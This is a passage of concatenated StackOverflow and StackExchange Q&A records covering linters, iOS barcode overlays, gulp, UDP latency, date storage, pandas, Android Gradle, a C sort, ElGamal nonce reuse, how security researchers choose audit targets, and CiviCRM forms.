If you are interested you can examine the output below.\nCurrently, I use <code>pylint<\/code>+<code>autopep8<\/code> (default by VS Code) and if you would like to stick with <code>black<\/code> I guess you need to switch your linter to something else.\n<code>\/\/ I have pylint installed already\n\u279c pipenv install --dev autopep8 \nInstalling autopep8\u2026\nAdding autopep8 to Pipfile's [dev-packages]\u2026\n\u2714 Installation Succeeded \nPipfile.lock (3830f9) out of date, updating to (6cacd5)\u2026\nLocking [dev-packages] dependencies\u2026\n\u2718 Locking Failed! \n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/resolver.py\", line 69, in resolve\n[pipenv.exceptions.ResolutionFailure]: req_dir=requirements_dir\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 726, in resolve_deps\n[pipenv.exceptions.ResolutionFailure]: req_dir=req_dir,\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 480, in actually_resolve_deps\n[pipenv.exceptions.ResolutionFailure]: resolved_tree = resolver.resolve()\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 395, in resolve\n[pipenv.exceptions.ResolutionFailure]: raise ResolutionFailure(message=str(e))\n[pipenv.exceptions.ResolutionFailure]: pipenv.exceptions.ResolutionFailure: ERROR: ERROR: Could not find a version that matches black\n[pipenv.exceptions.ResolutionFailure]: Skipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\n[pipenv.exceptions.ResolutionFailure]: Warning: Your dependencies could not be resolved. 
You likely have a mismatch in your sub-dependencies.\n First try clearing your dependency cache with $ pipenv lock --clear, then try the original command again.\n Alternatively, you can use $ pipenv install --skip-lock to bypass this mechanism, then run $ pipenv graph to inspect the situation.\n Hint: try $ pipenv lock --pre if it is a pre-release dependency.\nERROR: ERROR: Could not find a version that matches black\nSkipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\nThere are incompatible versions in the resolved dependencies.\n[pipenv.exceptions.ResolutionFailure]: req_dir=requirements_dir\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 726, in resolve_deps\n[pipenv.exceptions.ResolutionFailure]: req_dir=req_dir,\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 480, in actually_resolve_deps\n[pipenv.exceptions.ResolutionFailure]: resolved_tree = resolver.resolve()\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 395, in resolve\n[pipenv.exceptions.ResolutionFailure]: raise ResolutionFailure(message=str(e))\n[pipenv.exceptions.ResolutionFailure]: pipenv.exceptions.ResolutionFailure: ERROR: ERROR: Could not find a version that matches black\n[pipenv.exceptions.ResolutionFailure]: Skipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\n[pipenv.exceptions.ResolutionFailure]: Warning: Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.\n First try clearing your dependency cache with $ pipenv lock --clear, then try the original command again.\n Alternatively, you can use $ pipenv install --skip-lock to bypass this mechanism, then run $ pipenv graph to inspect the situation.\n Hint: try $ pipenv lock --pre if it is a pre-release dependency.\nERROR: ERROR: Could not find a version that matches black\nSkipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\nThere are incompatible versions in the resolved dependencies.\n<\/code>\nComment: pipenv uninstall black, pipenv clean, pipenv lock --clear, pipenv install black==19.10b0 (or whatever current version there is at the time you read this). 
Worked for me.\nAnswer: This works for me:\nI think part of the secret sauce is to disable certain pylint warnings which conflict with black (\"disable = ...\")\nAdd the file .pylintrc in root:\n<code># Looks like setup.cfg cannot load the extensions in the precommit,\n# but that the pylintrc file can\n# This happens even when specifying --rcfile=setup.cfg\n# Possible bug from pylint?\n[MASTER]\nload-plugins = pylint.extensions.docparams, pylint.extensions.docstyle, pylint.extensions.mccabe\n\n[BASIC]\naccept-no-param-doc = no\naccept-no-raise-doc = no\naccept-no-return-doc = no\naccept-no-yields-doc = no\ndefault-docstring-type = numpy\n\n[FORMAT]\nmax-line-length = 88\n\n[MESSAGES CONTROL]\ndisable = C0330, C0326, C0199, C0411\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get pylint and black working together in VSCode?","dup_signals":{}},"subset":"stackexchange"} +{"text":"add a uibarbutton for ZBarReaderViewController\n\nQuestion: I am working on ZBarReader and What I am having so far right now is \n<code>ZBarReaderViewController *controller = [[ZBarReaderViewController alloc] init];\ncontroller.navigationController.navigationBarHidden = NO;\n\/\/ Add Edit button to the right and handle click event UIBarButtonItem *manualButton = [[UIBarButtonItem alloc] initWithTitle:@\"Manual\" style:UIBarButtonItemStyleBordered target:self action:@selector(EditMode:)];\n[controller.navigationItem setRightBarButtonItem:manualButton];\ncontroller.readerDelegate = self;\n[self presentModalViewController:controller animated:YES];\n<\/code>\nMy question is that can we so such things above : set toolbar visible and add button on it for ZBarReaderViewController.\nAnswer: Yes, you have set some property first to your ZBarReaderViewController\n<code> self.zReader.showsCameraControls = NO;\n self.zReader.showsZBarControls=NO;\n<\/code>\nThen you have to set your custom <code>cameraOverlayView<\/code>, for example this set a <code>UIToolBar<\/code> with a left button to dismiss the picker and a <code>UISwitch<\/code> to control the flashMode:\n<code> self.zReader.cameraOverlayView=[self setOverlayPickerView];\n\n- (UIView *)setOverlayPickerView{\n UIView *v=[[UIView alloc] initWithFrame:CGRectMake(0, 0, 320, 480)];\n [v setBackgroundColor:[UIColor clearColor]];\n UIToolbar *myToolBar = [[UIToolbar alloc] init];\n UIBarButtonItem *backButton=[[UIBarButtonItem alloc] initWithTitle:@\"back\" style:UIBarButtonItemStyleBordered target:self action:@selector(dismissOverlayView:)];\n UISwitch *sw=[[UISwitch alloc] init];\n [sw setOn:NO];\n UIBarButtonItem *switchButton=[[UIBarButtonItem alloc] initWithCustomView:sw];\n UIBarButtonItem *fixed=[[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:nil action:nil]; \n [sw addTarget:self action:@selector(handleSwitchFlash:) forControlEvents:UIControlEventValueChanged];\n [myToolBar setItems:[NSArray arrayWithObjects:backButton,fixed,switchButton,nil]];\n [myToolBar setBarStyle:UIBarStyleDefault];\n CGRect toolBarFrame;\n toolBarFrame = CGRectMake(0, 436, 320, 44);\n [myToolBar setFrame:toolBarFrame];\n [v addSubview:myToolBar];\n return v;\n}\n\n- (void)dismissOverlayView:(id)sender{ \n [self dismissModalViewControllerAnimated: YES];\n}\n<\/code>\nComment: it does helps me. I tried and it worked. You know how can we load a view from nib instead of programming it ?\nComment: You can just create a normal UIViewController (with a xib) and pass its view to `cameraOverlayView`.\nComment: I have just gave it a try.. 
Please take a look at another post by me at [link](http:\/\/stackoverflow.com\/questions\/10156930\/customization-of-the-camera-overlay)\nComment: @ttran see my response in your other question (..and accept the answer if its useful for you:))\nAnswer: Besides @Mat answer, \nshould add \n<code>[self.zReader.view setFrame:[UIScreen mainScreen].bounds];<\/code> \nbefore \n<code>self.zReader.cameraOverlayView=[self setOverlayPickerView];<\/code> \nBecause, by default, the size of self.zReader is (320, 480).\nBy the way, if no need compatible iOS6.0, you can just use [AVCaptureDevice]: https:\/\/developer.apple.com\/library\/mac\/documentation\/AVFoundation\/Reference\/AVCaptureDevice_Class\/Reference\/Reference.html\n","meta":{"source":"stackoverflow","title":"add a uibarbutton for ZBarReaderViewController","dup_signals":{}},"subset":"stackexchange"} +{"text":"Looking for way to copy files in gulp and rename based on parent directory\n\nQuestion: For each module I have some files that need to be copied over to the build directory, and am looking for a way to minimize the repeated code from this: \n<code>gulp.src('.\/client\/src\/modules\/signup\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/signup'));\n\ngulp.src('.\/client\/src\/modules\/admin\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/admin'));\n<\/code>\nto something like this:\n<code>gulp.src('.\/client\/src\/modules\/(.*)\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/$1'));\n<\/code>\nObviously the above doesn't work, so is there a way to do this, or an npm that already does this?\nThanks\nAnswer: Not the answer, but applicable to this question's appearance in search results.\nTo copy files\/folders in gulp\n<code>gulp.task('copy', () => gulp\n .src('index.js')\n .pipe(gulp.dest('dist'))\n);\n<\/code>\nComment: @jinglesthula It's a useful service to those who arrive at this question via search engines, regardless of how well the search engine is doing its job. I appreciate it.\nComment: You've got to return the stream to let Gulp know when the task finishes.\nComment: I'm confused why an answer that says \"not the answer\" has more upvotes than the accepted answer that does answer the question. I'm not sure we should clutter SO with answers designed to make search engines do some particular thing as opposed to providing answers to the question. I think it's search engines' jobs to make something useful of what they get when they crawl the site. Just my $0.02\nComment: Hmmm... my gulp says this task completes, but the output file does not exist.\nComment: haha just realized this is more popular than the right question or right answer :P\nAnswer: The best way is to configure your <code>base<\/code> when sourcing files, like so:\n<code>gulp.src('.\/client\/src\/modules\/**\/index.js', {base: '.\/client\/src\/modules'})\n .pipe(gulp.dest('.\/build\/public\/js\/'));\n<\/code>\nThis tells <code>gulp<\/code> to use the modules directory as the starting point for determining relative paths.\n(Also, you can use <code>\/**\/*.js<\/code> if you want to include all JS files...)\nComment: There must be a more dynamic way of doing this - what about when src files come from 2 different directories and you want to preserve their directories in dest?\nComment: @IvanDurst I managed this specific case with the OP (answer) code. 
using the base config **and** using the relative path from the gulp file to independent files and `.\/folder-example\/**` full folders and files.\nAnswer: <code>return gulp.src('.\/client\/src\/modules\/(.*)\/index.js') \n .pipe(gulp.dest('.\/build\/public\/js\/$1'));\n<\/code>\nWorked for me !\nComment: ...so can someone rewrite it so it _does_ work as is, so people coming to this page looking for that exact snippet of code can actually use it?\nComment: .. even still, this *is* the answer.\nComment: So... are parens and $n \"backreferences\" allowed in src\/dest globs? They aren't regexes, afaik. This looks like what I'm looking for but the vinyl-fs docs are rather terse on the .src() and .dest() options and what's allowed in them and how they work.\nAnswer: Use for preserve input directory tree will be preserved. \n<code>.pipe(gulp.dest(function(file) {\n var src = path.resolve(SRC_FOLDER);\n var final_dist = file.base.replace(src, '');\n return DIST_FOLDER + final_dist;\n}))\n<\/code>\nUsing this, you can put in the src: <code>.src(SRC_FOLDER + '\/**\/*.js')<\/code>.\nThe others answers not worked for me (like using <code>base:<\/code> on <code>src()<\/code>}, because some plugins flatten the directory tree.\nAnswer: copy files in parallel\n<code>gulp.task('copy', gulp.parallel(\n() => gulp.src('*.json').pipe(gulp.dest('build\/')),\n() => gulp.src('*.ico').pipe(gulp.dest('build\/')),\n() => gulp.src('img\/**\/*').pipe(gulp.dest('build\/img\/')),\n)\n);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Looking for way to copy files in gulp and rename based on parent directory","dup_signals":{}},"subset":"stackexchange"} +{"text":"udp sendto lasting too long (unusual times)\n\nQuestion: In my application I'm sending data via an UDP socket with a rate of around 58MB\/second. Most of the times it works fine however some time the sendto last too long and the time are grouped around 0.1, 0.2, 0.3 seconds (see immage below).\nMy system is a linux system with kernel 2.6.32-24-server, the buffer for each send is 45000 bytes long. Do you have a clue on why sometime this happens?\nComment: have you tried it with an RT kernel?\nAnswer: From send(2):\n<code>When the message does not fit into the send buffer of the socket,\n send() normally blocks, unless the socket has been placed in nonblock\u2010\n ing I\/O mode. In nonblocking mode it would fail with the error EAGAIN\n or EWOULDBLOCK in this case. The select(2) call may be used to deter\u2010\n mine when it is possible to send more data.<\/code>\nOther than this the kernel might be doing something else in the meantime. If this is the case, using an RT kernel might help as suggested by yi_H.\nComment: What is strange to me is why the 0.1, 0.2, 0.3 and so on\nComment: Also a tenth second is a terrible long time for networking... how do you send the data? Is it sent evenly or in bursts? Could the send buffer get full? 100Mb\/1Gb\/.. card?\nComment: It's evenly, we have 1Gb card, we have upgraded to 2.6.38-10 that is thick less (the previous one 2.6.32-24 was not) and now we are not able to replicate the problem.\n","meta":{"source":"stackoverflow","title":"udp sendto lasting too long (unusual times)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Storing a non-specific date (eg. \"Fall 1997\") in a relational database\n\nQuestion: I am parsing a text document and converting much of the data into a relational format. 
A variety of date formats are used throughout, but one of these is \"Fall 1997\".\nWhat would be the best way to go about storing this information, which is non-specific in one sense (not an absolute date), without losing the granularity that \"fall\" does provide?\nAs additional info: my specific database is MySQL.\nComment: Do you need to be able to sort the result, such that a specific date in the summer of 1997 will sort right before the \"Fall 1997\" date?\nAnswer: There are various techniques I've seen, but without loading it in straight varchar, you'll have to decide on the scope. You can use a regular date column containing 1997-09-01 but augment it with a column which indicates the specificity - 'S' for season (using the firsts of months 3, 6, 9, 12) 'Q' for quarter (using the firsts of months 1, 4, 7, 10) or whatever. Similarly for semesters and things like that.\nWhen interpreting such dates - particularly in \"did this event happen before or after a certain time\", you have to decide how to handle them. Like whether the whole period has to come before a date.\nYou can convert such a \"date\" to an entry in a period table with a description and a start and end date and then link to the period. Then Fall 1997 is a database entity in the sense that it is well defined as a row in a table and other rows have foreign keys to it. This does not remove the need for logic to decide things about these dates, but it does mean that such logic can be table driven.\nIt would depend a lot more on the usage scenarios and the variety of data before I would make a call.\n","meta":{"source":"stackoverflow","title":"Storing a non-specific date (eg. \"Fall 1997\") in a relational database","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to sort a pandas dataframe column by item type?\n\nQuestion: I have the following column in my Dataframe:\n<code>import pandas as pd\nx = pd. Series(['R1', 'R2', 70, -100, 0, -25, 'R7', 'R8'])\ndf = pd.DataFrame(x)\n<\/code>\nI want to sort the column such that the output is:\n<code>['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]\n<\/code>\nHow can I solve it?\nComment: How is 70< -100? why is 0 < -25? What's the sorting logic?\nComment: Why don't you just sort the dataframe while creating it? So just use `df = pd.DataFrame(pd.Series(['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]))`\nComment: Please explain your sorting logic\nComment: my sorting logic is to just group it according to the type without changing the sequence.\nComment: I cannot do the sort it while creating because Im not creating it myself, it is derived from other data. Just for the sake of this qestion, I created it here.\nAnswer: I'm giving this with example to handle the 2 <code>types<\/code> which you have mentioned in your question :\n<code>import pandas as pd\ndf = pd.DataFrame()\n\ndf['random_vals'] = pd.Series(['R1', 'R2', 70, -100, 0, -25, 'R7', 'R8'])\n\ndef sort_by_type(random_types_list):\n str_list = []\n int_list = []\n for elem in random_types_list:\n if isinstance(elem, str):\n str_list.append(elem)\n elif isinstance(elem, int):\n int_list.append(elem)\n return str_list+int_list\n\nprint(sort_by_type(list(df['random_vals'])))\n<\/code>\nOutput of the <code>print<\/code> statement :\n<code>>>> print(sort_by_type(list(df['random_vals'])))\n['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]\n<\/code>\n\nSimilarly you can add the code in <code>sort_by_types<\/code> method for other <code>data-types<\/code> aswell. \nComment: Thank you very much Mr. Sowanja! 
I liked that approach, but all the other columns of the data frame won't change along with it. Is there any way to shuffle all columns with this column?\nComment: will try that out\n","meta":{"source":"stackoverflow","title":"How to sort a pandas dataframe column by item type?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Failed to resolve: com.android.support:design:25.0.1\n\nQuestion: Failed to resolve: com.android.support:design:25.0.1\nERROR- this support library should not use a different verion(25) than the compileSdkVersion(28) \n<code> dependencies {\n implementation fileTree(dir: 'libs', include: ['*.jar'])\n implementation 'com.android.support:appcompat-v7:28.0.0-beta01'\n implementation 'com.android.support.constraint:constraint- layout:1.1.2'\n testImplementation 'junit:junit:4.12'\n androidTestImplementation 'com.android.support.test:runner:1.0.2'\n androidTestImplementation 'com.android.support.test.espresso:espresso- \n core:3.0.2'\n\n \/\/add library\n compile 'com.android.support:design:25.0.1'\n compile 'com.firebaseui:firebase-ui:0.6.2'\n}\n<\/code>\nComment: try `compile 'com.android.support:design:28.0.0-beta01'`\nComment: I did, this is showing now: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui:0.6.2] C:\\Users\\h\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-0.6.2.aar\\84f7ed608b610d3a6c07ea2571ca66a0\\AndroidManifest.xml as the library might be using APIs not available in 15\nComment: this suggestion is showing - Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui\" to force usage (may lead to runtime failures)\nComment: change `minSdkVersion 16` in build.gradle\nAnswer: Libraries from same \"group\" or referencing each others, must use the same version (when possible). Support llibraries, in particular, must have the same version of your compiled one.\nYou have <code>implementation 'com.android.support:appcompat-v7:28.0.0-beta01'<\/code> that is targeting a <code>28 Beta version<\/code> and <code>compile 'com.android.support:design:25.0.1'<\/code> targeting <code>25 version<\/code>.\nAlso you are probably using <code>compileSdkVersion 28<\/code>.\nImplement support:design library to refer to version <code>28.0.0-beta01<\/code> too and it will (probably) will be fixed.\nin shorts, use this gradle snippet:\n<code>implementation fileTree(dir: 'libs', include: ['*.jar'])\nimplementation 'com.android.support:appcompat-v7:28.0.0-beta01'\nimplementation 'com.android.support.constraint:constraint- layout:1.1.2'\ntestImplementation 'junit:junit:4.12'\nandroidTestImplementation 'com.android.support.test:runner:1.0.2'\nandroidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2'\n\n\/\/add library\nimplementation 'com.android.support:design:28.0.0-beta01'\nimplementation 'com.firebaseui:firebase-ui:0.6.2'\n<\/code>\n(use <code>implementation<\/code> instead of <code>compile<\/code> since it will be replaced soon)\nHope this helps. Let me know if this solved!\nEdit from comment below\nWhy are you using old versions? 
is there a reason?\nincrease firebase version also, the last should be 4.1\n<code>implementation 'com.firebaseui:firebase-ui-database:4.1.0'\n<\/code>\nComment: I did the same but after syncing this shows: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui:0.6.2] C:\\Users\\hp\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-0.6.2.aar\\84f7ed608b610d3a6c07ea2571ca66a0\\AndroidManifest.xml as the library might be using APIs not available in 15\n Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui\" to force usage (may lead to runtime failures)\nComment: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui-database:4.1.0] C:\\Users\\hp\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-database-4.1.0.aar\\35f2453636c0d9c1cf2fc620ff9a897d\\AndroidManifest.xml as the library might be using APIs not available in 15\n Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui.database\" to force usage (may lead to runtime failures)\nComment: @BTSJimin no problem, consider marking the answer as the solution to help other people with the same problem :)\nAnswer: Replace \n<code>compile 'com.android.support:design:25.0.1'\n<\/code>\nwith \n<code>compile 'com.android.support:design:28.0.0'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Failed to resolve: com.android.support:design:25.0.1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Insertion sort runtime error\n\nQuestion: I created a basic array and tried to sort it using an insertion sort but I get these errors as I run the program. There are no errors after compiling\n\n.\/insertionsort.c: line 3: $'\\r': command not found\n.\/insertionsort.c: line 4: syntax error near unexpected token `('\n'\/insertionsort.c: line 4: `void sort(int *array, int n);\n\nDoes anyone have any ideas how to fix this?\n<code>#include <stdio.h>\n#include <stdlib.h>\n\nvoid sort(int *array, int n);\nvoid swap(int array1, int array2);\n\nvoid main()\n{\n int arr[] = {1, 5, 3, 5, 4, 3, 2, 7, 4, 9, 6};\n int n = sizeof(arr);\n\n sort(arr, n);\n}\n\nvoid sort(int *array, int n)\n{\n int i, j;\n\n printf(\"Array before sorting: \");\n for (i=0; i<n; i++)\n printf(\"%d \", &array[i]);\n\n for (i=1; i<n; i++)\n {\n for (j=i; j>0; j--)\n {\n if (array[j-1] > array[j])\n swap(array[j], array[j-1]);\n }\n }\n\n printf(\"Array after sorting: \");\n for (i=0; i<n; i++)\n printf(\"%d \", &array[i]);\n}\n\nvoid swap(int array1, int array2)\n{\n int temp;\n temp = array1;\n array1 = array2;\n array2 = temp;\n}\n<\/code>\nComment: Well, then, I think you can just use `gcc -o main main.c` where `main.c` would be the source file containing the code from above. And then just type `.\/main` to run you program. I'm not seeing where the problem could be, but maybe I'm missing something. Could you please try that? Or are you using another method to builld\/run your application?!\nComment: How are you compiling your source file? How are you running it? Are you on Linux or Windows? 
Are you using an IDE or the command line?\nComment: I'm on windows and I'm using the cygwin terminal\nComment: i didn't have gcc but i had g++, thanks!\nComment: So...did it work with no errors then?\nComment: Yes, got rid of all of them\nComment: Great, happy hacking then..and don't forget to [accept an answer](https:\/\/meta.stackexchange.com\/questions\/5234\/how-does-accepting-an-answer-work)\nAnswer: I think you might want to do\n<code>int n = sizeof(arr) \/ sizeof(int);\n<\/code>\nas <code>sizeof(arr)<\/code> would give you the total number of bytes needed by your array.\nAlso, you're printing pointers. So you can remove the <code>&<\/code> in your print statements:\n<code>printf(\"%d \", array[i]);\n<\/code>\nLastly, you're passing by value to your <code>swap<\/code> function. So the original array will not be modified. You might want a signature like this:\n<code>void swap(int *array1, int *array2);\n<\/code>\nI don't get any error running your program, only warnings for your <code>printf<\/code>, the reason being the one mentioned above. You should compile\/run your program something like this: <code>gcc -o main main.c<\/code> where <code>main.c<\/code> would be the source file containing the code from above. And then just type <code>.\/main<\/code>.\nComment: how can I fix the problem of passing by value to my swap function? I tried adding an asterix before array1 and array2 in the swap function but i just get more errors\nComment: @Michael, you must also change the call of your `swap` in the `sort` function. Hint: it has something to do with pointers.\nComment: thank you for the help, I can't figure out the swap function (it's late), so I just took it out and put the contents of it right in my if statement. Works perfect now\nAnswer: From the program name <code>.\/insertionsort.c<\/code> in your error message, I guess you are trying to execute your source code directly, which isn't normal procedure.\nI think you should type the name of your compiled binary file instead your source code to your terminal to run the program.\nComment: That would be interesting. But would the `.c` file be executable by default?! Shouldn't he get a `permission denied` instead? I'm guessing he didn't just `chmod +x insertionsort.c` by mistake.\nComment: @Mihai This execution is performed on Windows, on which such `chmod` isn't required to execute files.\n","meta":{"source":"stackoverflow","title":"Insertion sort runtime error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Semi static ElGamal vulnerability when the secret is not truely random\n\nQuestion: Assume Alice wants to communicate with Bob. Bob provides his public parameters $(g,n,y)$ with $y=g^x$ where $x$ is his secret key\nNow Alice wants to send $m$ to Bob. She generates a random $r$ and computes $u = g^r$ and $c=my^r$ and sends back to Bob $(u,c)$.\nYou intercept $(g,n,y)$ and $(u,c)$ and you also know what $m$ is. \nAs far as I know, it is still not possible to recover $r$ from this. \nBut what happens if Alice sends a second message $(u',c')$ with $u' = g^{r'} = g^{f(r)}$, in other words $r'$ can be easily computed from $r$.\nCan you recover $m'$ and\/or even $r$ ?\nAnswer: The answer obviously depends on what $f$ is. However, we can say a few general things.\nIf $f$ is a \"simple\" linear function (e.g. $f(r) = kr$ for most constant $k$), you can recover $m'$ easily. You cannot recover $r$ or $r'$.\nIf $f$ is a more complex function that is bijective or nearly bijective (say SHA-256), then you probably cannot recover $m'$. 
You cannot recover $r$ or $r'$.\nIf $f$ is a sufficiently many-to-one function and its inverse image is sufficiently simple (say $f(r) = r \\bmod{2^i}$ for a suitable $i$), you may be able to recover $r$ and $r'$.\n","meta":{"source":"crypto.stackexchange","title":"Semi static ElGamal vulnerability when the secret is not truely random","dup_signals":{}},"subset":"stackexchange"} +{"text":"Security Researchers: How do you choose what services or software you are going to audit next?\n\nQuestion: Security Researchers: How do you choose what services or software you are going to audit next?\nI am referring to finding vulnerabilities and developing exploits in various applications. I am wandering how decide what software you will target next? \nComment: +3 for this awesome question! A simple +1 won't cut it.\nAnswer: I audit a lot of code, I write exploits, and I have accumulated more than 50 CVE's over the course of about 6 years of bug hunting. \nWhen I went on my first serious bug hunt I was looking for weak projects that had not be extensively audited by the community(or milw0rm back in the day). To do this I used SourceForge's Advanced Search, which has changed a lot. Basically I was looking for a PHP project that people where downloading and using, but wasn't very popular. Lets say around ~1,000 downloads and less than 1 year old. I found Ultimate PHP Board which turned out to be very insecure. \nAs time progressed I got bored with insecure projects so I changed my tactics entirely and started going after popular projects. For example I exploit PHPMyAdmin which is the most downloaded PHP application.\nAfter years of penetration testing and application development you get a kind of 6th sense into how the code works and where the problem areas can be. You can look at a piece of functionality and write an implementation in your head and pick out where things could go wrong. So on a penetration test I always ask my self the same question: \"What is the worst that could happen?\". And then go out and focus my testing based on this question.\nI'll give you a good example. I saw an advertizement for Canonical Landscape (Maker of Ubuntu). In the ad it showed a feature of Landscape where you could execute a command on every machine you own as root. I thought to my self, \"What if it was vulnerable to CSRF?\". I signed up for a free trail, and sure enough, you could gain remote root on every machine using a single forged HTTP request. Outch! (I also got remote root on cPanel with CSRF, and I earned a severity metric :)\nAnother flaw I found in Google Music, I uploaded an MP3 that had JavaScript in all of the ID3 tags. Sure enough the artist and album names where being printed to the page, and I got $500 from the bug bounty program with my very first test. One of the reasons why I chose this input is because i knew it wouldn't be exercised by a dumb vulnerability scanner. Its as if I knew it would fail ahead of time. That kind of innate understanding only comes with years of practice. \nComment: Link http:\/\/www.exploit-db.com\/author\/1\/?a=628 is no longer accessible. Returns 404.\nComment: @kinunt http:\/\/www.exploit-db.com\/author\/?a=628 ?\nAnswer: By scanning the internet, the Nmap team has elaborated a list of the most commonly exposed TCP and UDP services. 
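For illustration, a minimal Python sketch \u2014 assuming the frequency-annotated nmap-services file that ships with Nmap, at its usual Linux path \u2014 of pulling that ranking yourself (the path and variable names are assumptions, not part of the original answer):\n<code>from pathlib import Path\n\n# Assumed default location of Nmap's bundled services list; adjust for your install.\nSERVICES_FILE = Path('\/usr\/share\/nmap\/nmap-services')\n\nentries = []\nfor line in SERVICES_FILE.read_text().splitlines():\n    if not line.strip() or line.startswith('#'):\n        continue  # skip blank lines and comment lines\n    name, port_proto, freq = line.split()[:3]  # e.g. 'http', '80\/tcp', '0.484143'\n    entries.append((float(freq), port_proto, name))\n\n# Highest open-frequency first, i.e. the most commonly exposed services.\nfor freq, port_proto, name in sorted(entries, reverse=True)[:20]:\n    print(name, port_proto, freq)\n<\/code>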
You can make use of this list in order to determine the next service you will be auditing next, assuming that you want to target the most commonly used ones.\n","meta":{"source":"security.stackexchange","title":"Security Researchers: How do you choose what services or software you are going to audit next?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set read only field in Drupal CiviCRM\n\nQuestion: I would like to set a read only field in Drupal CiviCRM:\n<code>mymodule_civicrm_buildForm($formName, &$form) {\n ...\n\n \/\/ Set default value\n $defaults['readonly_field'] = xxx;\n $form->setDefaults($defaults);\n\n \/\/ Set read only\n $element = $form->getElement('event_type_id');\n $element->updateAttributes(array('disabled'=>true));\n}\n<\/code>\nThe field is disabled for input; however, the default value cannot be passed through the form submission.\nThe form warns that this required field does not input.\nCould you advise how to set the read only field correctly?\nThanks a lot!!\nAnswer: Try <code>$element->updateAttributes(array('readonly'=>true));<\/code>\nThe difference between readonly and disabled is a common thing with HTML and forms.\nSee for example https:\/\/stackoverflow.com\/questions\/7730695\/whats-the-difference-between-disabled-disabled-and-readonly-readonly-for-ht\n","meta":{"source":"civicrm.stackexchange","title":"How to set read only field in Drupal CiviCRM","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hadoop - IntWritable(int) constructor not loaded\n\nQuestion: I'm trying to make a 